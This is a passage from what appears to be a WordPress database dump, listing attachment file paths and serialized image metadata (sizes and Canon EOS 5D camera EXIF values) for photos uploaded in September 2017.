5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305136\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1059,268,'_wp_attached_file','2017/09/IMG_0961.jpg'),(1060,268,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1006;s:4:\"file\";s:20:\"2017/09/IMG_0961.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0961-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0961-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0961-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0961-1024x687.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:687;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305153\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1061,269,'_wp_attached_file','2017/09/IMG_0962.jpg'),(1062,269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1006;s:4:\"file\";s:20:\"2017/09/IMG_0962.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0962-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0962-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0962-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0962-1024x687.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:687;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305156\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1063,270,'_wp_attached_file','2017/09/IMG_0965.jpg'),(1064,270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0965.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0965-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0965-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0965-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0965-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305200\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1065,271,'_wp_attached_file','2017/09/IMG_0968.jpg'),(1066,271,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0968.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0968-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0968-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0968-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0968-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305207\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1067,272,'_wp_attached_file','2017/09/IMG_0972.jpg'),(1068,272,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0972.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0972-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0972-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0972-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0972-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305253\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"34\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1069,273,'_wp_attached_file','2017/09/IMG_0974.jpg'),(1070,273,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1004;s:4:\"file\";s:20:\"2017/09/IMG_0974.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0974-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0974-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0974-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0974-1024x685.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:685;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305263\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1071,275,'_wp_attached_file','2017/09/IMG_0981.jpg'),(1072,275,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0981.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0981-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0981-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0981-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0981-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305401\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1073,276,'_wp_attached_file','2017/09/IMG_0982.jpg'),(1074,276,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0982.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0982-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0982-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0982-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0982-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305403\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1075,277,'_wp_attached_file','2017/09/IMG_0983.jpg'),(1076,277,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1007;s:6:\"height\";i:1500;s:4:\"file\";s:20:\"2017/09/IMG_0983.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0983-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0983-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0983-768x1144.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0983-687x1024.jpg\";s:5:\"width\";i:687;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305410\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1077,278,'_wp_attached_file','2017/09/IMG_0984.jpg'),(1078,278,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_0984.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0984-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0984-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_0984-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0984-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305421\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1079,279,'_wp_attached_file','2017/09/IMG_1000.jpg'),(1080,279,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1000.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1000-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1000-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1000-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1000-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305555\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"34\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1082,281,'_wp_attached_file','2017/09/IMG_1001.jpg'),(1083,281,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1001.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1001-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1001-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1001-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305561\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"42\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1084,282,'_wp_attached_file','2017/09/IMG_1012.jpg'),(1085,282,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1012.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1012-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1012-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1012-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1012-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305622\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"38\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1086,283,'_wp_attached_file','2017/09/IMG_1013.jpg'),(1087,283,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1013.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1013-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1013-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1013-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1013-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305643\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"46\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:17:\"0.011111111111111\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1088,284,'_wp_attached_file','2017/09/IMG_1024.jpg'),(1089,284,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1024.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1024-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1024-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1024-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1024-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378305730\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"54\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1090,285,'_wp_attached_file','2017/09/IMG_1056.jpg'),(1091,285,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1056.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1056-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1056-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1056-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1056-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378306187\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1092,286,'_wp_attached_file','2017/09/IMG_1108.jpg'),(1093,286,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1108.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1108-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1108-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1108-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1108-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 5D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1378306537\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1096,287,'_wp_attached_file','2017/09/IMG_1109.jpg'),(1097,287,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2017/09/IMG_1109.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1109-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1109-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1109-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1109-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 